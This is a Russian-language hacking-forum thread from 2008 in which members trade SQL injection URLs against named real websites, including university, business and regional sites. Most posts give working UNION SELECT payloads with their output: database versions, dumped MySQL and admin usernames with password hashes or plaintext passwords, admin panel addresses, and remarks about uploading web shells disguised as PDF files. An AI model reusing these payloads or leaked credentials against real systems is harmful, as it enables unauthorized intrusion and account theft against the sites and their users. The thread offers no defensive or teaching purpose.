Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
27.10.2008, 14:16
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
http://www.macaubusiness.com/index.php?cat_id=&tim=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(v ersion(),1),1),7,8,9/*
4.1.18
http://www.michaelpollan.com/article.php?id=99999+union+select+1,version(),3,4, 5,6,7,8,9,0/*
4.1.22-standard
|
|
|
28.10.2008, 04:58
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216
Репутация:
150
|
|
http://www.kdk.co.id/news.php?idcategory7=1+union+select+1,version(),us er(),4,5,6,7,8--
4.1.22-standard-log
|
|
|
|
28.10.2008, 06:49
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
по традиции, продолжаем серию .edu
North Carolina Agricultural and Technical State University
Код:
http://www.ncat.edu/press_releases/disp_release.php?ID=-2930+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,0x3a,password,0x3a,host),17,18+from+mysql.user+limit+1,1/*
4.0.12-standard
PR=8
----------------------------------------------------------------
Stanford
Код:
http://ed.stanford.edu/suse/news-bureau/displayRecord.php?tablename=susenews&id=-71+union+select+1,concat(user,0x3a,password,0x3a,host),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user+limit+22,1/*
5.0.22
PR=7
---------------------------------------------------------------
COMET Outreach Program
Код:
http://www.comet.ucar.edu/outreach/details.php?id=-2126+union+select+1,concat(username,0x3a,password),version(),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users/*
vickie:comet(х.з. откуда...)
5.0.26-log
PR=6
На сайте имеется мини-квест с java технологиями =) (кто пройдет, отпишитесь, ок? )
Код:
http://strc.comet.ucar.edu/documents/login.htm
------------------------------------------------------------
Tufts University
Код:
http://inside.tufts.edu/announce/index.php?t=id&id=640+union+select+1,2,unhex(hex(version())),4,5,6,7,8+from+users/*
4.1.14-log
PR=6
|
|
|
|
28.10.2008, 14:43
|
|
Познающий
Регистрация: 16.03.2007
Сообщений: 48
Провел на форуме:
293334
Репутация:
39
|
|
http://www.downtowncrossing.org/shop/shop.php?id=103'
www.downtowncrossing.org/admin
Неподходит логин и пасс, думаю из за того что он от шопа, в базе ковырялся, так и не нашел, может кому то из вас повезет.
dca1:dertg1
|
|
|
|
28.10.2008, 21:24
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от xPriZrAkx
Неподходит логин и пасс, думаю из за того что он от шопа, в базе ковырялся, так и не нашел, может кому то из вас повезет.
dca1:dertg1
да нет, просто там защита .htaccess, к базе никакого отношения не имеет
|
|
|
|
29.10.2008, 10:00
|
|
Познающий
Регистрация: 16.03.2007
Сообщений: 48
Провел на форуме:
293334
Репутация:
39
|
|
http://www.onlymelbourne.com.au/melbourne_details.php?id=-6315+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53--
5.0.51a-community
onlymelb@localhost
onlymelb_melbourne
Больше ничего нашел интересного кроме как:
http://www.onlymelbourne.com.au/melbourne_details.php?id=-6315+union+select+1,2,3,count(email),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53+from+emails--
228 - таблиц
14633 - мыл
emails = 170 таблица
Админка:
Код:
http://www.onlymelbourne.com.au/admin1.htm
Login: alan
Pass: jaxons2008
------------------------------------------------------------------------------------------------------------------------
http://www.pangeaday.org/filmDetail.php?id=14+union+select+1,2,3,4,5,6,vers ion(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3--
5.0.45-log
Последний раз редактировалось xPriZrAkx; 29.10.2008 в 10:05..
|
|
|
|
29.10.2008, 15:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Скули из таблицы user базы mysql (5 шт.)
http://en.chinacourt.org/public/detail.php?id=-1+union+select+1,password,3,4,5,user,7,8,9,10,11+f rom+mysql.user+limit+1,1--
zq16167 ; 22f421104e6fdb11
Вот, и с MySQL паролик вытащили.
Проверьте, если есть желание...
просто пароль в публичной базе не нашел, а брутить... =(
http://www.medtechmammography.com/articles.php?id=-1+union+select+1,user,3,4,password,6,7+from+mysql. user+limit+0,1--
yroot ; 135a94ef50ef2ac7
http://www.medtechmammography.com/admin/ - phpMyAdmin 2.5.0
(PR 2)
http://www.beijing2008conference.com/articles.php?id=-1+union+select+user,password,3,4,5,6,7+from+mysql. user+limit+0,1--
root ; 7eba08fa3d983a6b
(PR 2)
http://www.greatleighs.com/articles.php?id=-1+union+select+1,password,3,user,5,6,7,8,9+from+my sql.user--
root ; 39d5d18a469d0dc5
(PR 3)
http://www.alumni.wayne.edu/news.php?id=-1+union+select+1,user,password,4,5,6+from+mysql.us er/*
root ; 41bb620c59bba24e
хеш не подобрал
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
Скули с админками (12 шт.):
http://www.passingdb.com/articles.php?id=-1+union+select+1,2,user_level,4,user_password,6,7, 8,9,10,11,username,13,14,15,16+from+phpbb_users+wh ere+user_level=1+limit+1,1--
Админ форума - Tof ; d780ef00c2edaf2f26f92e06a0db5f30 пароль - 5275326
http://www.sana-med.com.ua/articles.php?id=-1+union+select+1,username,3,user_password+from+san a_forum_users+limit+3,1--
Стоит phpBB форум! Вот логин;хеш админа, хеш подобрать не смог!
admin;9fed66b17b90086737f7718f83f2c6dd
Более 2600 зареганых пользователей
http://www.doctordans.com/articles.php?id=-1+union+select+1,name,password,4,5,6,7,8,9,10,11,1 2,13+from+cms_user--
http://www.doctordans.com/login.php
DanFanselow ; nae2Itha
Очень хорошо льется шелл =)
http://www.haltonheritage.com/articles.php?id=-1+union+select+1,2,3,4,username,6,7,8,password,10, 11,12,13,14,15,16+from+security--
chiefadmin ; chief
http://www.haltonheritage.com/admin/
Отлично льется шелл (Если его под видом pdf приаттачивать! =))
есть доступ к соседним сайтикам... короче интересное место! =)
(PR 2)
http://www.atlascaptives.com/articles.php?id=-1+union+select+1,2,password,4,Username+from+authus ers+limit+0,1--
http://www.atlascaptives.com/admin/
atlas ; 9455556
(PR 3)
http://www.al-nafeh.com/articles.php?op=1&id=-1+union+select+1,username,3,userpass,5,6+from+user--
admin ; al-nafeh
http://www.al-nafeh.com/admin/login.php
(PR 2)
http://www.techaltar.com/articles.php?id=-1+union+select+1,password,3,4,5,6,7,8,9,10,admin_i d,12,13,14,15,16,17,18,19,20,21,22+from+tech_admin s--
Логин - dinesh
хеш - 9c9f1c65b1dc1f79498c9f09eb610e1a
Пароль - dinesh
http://www.techaltar.com/admin/
(PR 0)
http://www.mickstaton.com/articles.php?ID=-1+union+select+username,password,3+from+admin--
mstaton ; goofy1
Есть админка, но пароль туда не подходит... =(
http://www.mickstaton.com/admin/
(PR 3)
http://www.switchvfx.com/en/about.php?id=-1+union+select+1,2,password,username+from+users/*
http://www.switchvfx.com/en/admin/
switchadmin ; w3bt3@m
Неполадки с сервером MySQL
http://antireality.net/articles.php?id=-1+union+select+1,2,name,4,5,6,password,8+from+memb ers+limit+0,1--
Randy53215 ; b1e0d66c6238a74d0c22f1e7576e797f
Подобрать хеш не смог!
Кстати, там какая то бага с авторизацией! При первом заходе я зашел под каким то юзверем,
и по глупости вышел, а рега не работает! =(
(PR 1)
http://antikwar.by/articles.php?mode=show&id=-1+union+select+1,2,3,pass,5,6+from+users/*
admin ; st0pkran
http://antikwar.by/admin/login.php
пароль почему то не подходит...
http://www.physics.hmc.edu/news.php?id=99999999999+union+select+1,2,3,usernam e,pwd+from+tuserinfo/*
http://www.hmc.edu/admin/
не работает! =(
(PR корневого сайта - 7, субдомена - 4)
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::
Всякие-разные скули (28 шт.):
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,version(),database()--
http://www.choices.edu/resources/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26--
::::::::::::::::::::::::::::: Украина :::::::::::::::::::::::::::::
http://www.sadochek.com.ua/articles.php?id=-1+union+select+1,2,3--
http://www.nvip.com.ua/articles.php?id=999999999999+union+select+1,2,3,4, 5,6,7,8/*
http://m-nafta.com.ua/articles.php?p=details&id=-1+union+select+1,version(),database(),4,5--
http://jean-jack.com.ua/articles.php?id=-1+union+select+version(),2,database()--
::::::::::::::::::::::::::::: Зона .com :::::::::::::::::::::::::::::
http://frontrowmanila.com/articles.php?id=-1+union+select+1,version(),database(),4,5,6--
(PR ???)
http://stayhealthy-livewell.com/articles.php?id=-1+union+select+1,version(),database(),user(),5,6,7 ,8,9,10,11,12,13,14--
(PR 0)
http://www.fluidmission.com/articles.php?id=-1+union+select+1,version(),3,user(),5,6,7,8,9,10,1 1,12,database()--
(PR 0)
http://www.joannetherrien.com/articles.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11--
(PR 3)
http://www.somachlaw.com/articles.php?id=-1+union+select+1,2,3,4,5,6--
(PR 4)
http://carlighthouse.com/articles.php?id=-1+union+select+1,password,username,4,5,6,7+from+ad minlogin+limit+0,1--
админка похоже тут http://carlighthouse.com/admin/login.php
Но что то пока не пашет!
(PR 0)
http://www.voiceforhumanity.com/articles.php?id=-1+union+select+1,version(),3,database(),5,6,7,8,9, 10,11--
(PR 4)
http://www.u-coc.com/articles.php?id=-1+union+select+1,2,3,4--
(PR 1)
http://www.greatermedia.com/press/detail.php?ID=-1+union+select+1,version(),3,4,5,6,7,8,9,user(),11 ,12,13,14,15,16,17,18--
::::::::::::::::::::::::::::: Зона .net :::::::::::::::::::::::::::::
http://www.andrewsimon.net/articles.php?id=-1+union+select+1,2,version(),4,user(),6,7,database ()/*
(PR 3)
http://www.bacuser.net/articles.php?id=-1+union+select+1,2,3,4,5/*
(PR 1)
http://rndfido.net/articles.php?id=-1+union+select+1,2,3,4,5,6/*
(PR 3)
::::::::::::::::::::::::::::: Англия :::::::::::::::::::::::::::::
http://www.cedexx.co.uk/articles.php?id=-1+union+select+1,2,3,4,5,6,7/*
Есть админка, нерабочая, дальше искать не стал.
http://www.cedexx.co.uk/admin/
http://www.emgonline.co.uk/articles.php?id=-1+union+select+1,table_name,3,4,5,6,7+from+informa tion_schema.TABLES+limit+17,1--
Админку не нашел
::::::::::::::::::::::::::::: Австралия :::::::::::::::::::::::::::::
http://unichat.com.au/articles.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+inf ormation_schema.TABLES+limit+56,1--
http://unichat.com.au/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users--
Вот тут непонятно... из information_schema достает, а из своей не хочет... странно...
http://www.vistageconsulting.com.au/articles.php?mid=1&id=-1+union+select+1,2,3--
Не смог подобрать таблицу юзверей! Вероятнее всего стоит префикс...
::::::::::::::::::::::::::::: Белоруссия :::::::::::::::::::::::::::::
http://kosmetika.of.by/articles.php?mode=show&id=-1+union+select+1,2,3,4,5,6/*
Также не смог подобрать таблицу... =(
http://noutbuk.by/articles.php?category=0&mode=show&id=-1+union+select+1,2,3,4,5,6,7/*
http://noutbuk.by/admin/
Также не смог подобрать таблицу... =(
::::::::::::::::::::::::::::: Италия :::::::::::::::::::::::::::::
http://www.myxbox.it/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*
http://www.italiaoil.it/news.php?ID=-1+union+select+1,2,user,password,5,6,7,8,9,10,11,1 2+from+mysql.user--
хм... странный сайт... из базы достает юзеров а пароли нет... рут переименовал столбец чтоли...
http://www.awanet.it/news.php?id=-1+union+select+1,2,3,4,5/*
::::::::::::::::::::::::::::: Зона .info :::::::::::::::::::::::::::::
http://tipsforliving.info/articles.php?id=-1+union+select+1,2,3,4,5,6,7/*
http://tipsforliving.info/admin/
Админка похоже закрыта .htaccess по ip... =(
Итого: 45 скулей! =)
P.S. Если есть неточности, пожалуйста сообщите, скули были найдены несколько дней назад, мошли измениться пароли и т.п.
|
|
|
|
29.10.2008, 20:18
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
http://www.heimlichinstitute.org/page.php?id=-34+union+select+1,unhex(hex(version())),unhex(hex( concat_ws(0x3a,password,user))),4+from+mysql.user+ limit+1,1/*
MySQL Version: 5.0.17-nt-log
Последний раз редактировалось InFlame; 29.10.2008 в 20:22..
|
|
|
|
29.10.2008, 20:28
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Код:
http://www.persiandel.com/iranian_music.php?id=-1+union+select+1,concat_ws(0x3a,user,psw),3,4,5,6,7+from+prelude--
Код:
http://www.reper.ru/rus/index.php?catid=-91%20union%20select%201,2,3,version(),5,6,7,8,9,0,1,2,3,4%20admin/*
Последний раз редактировалось kair; 29.10.2008 в 20:48..
|
|
|
|
30.10.2008, 03:55
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
http://www.remhq.com/news_story.php?id=-894'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7/*
5.0.45-log
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
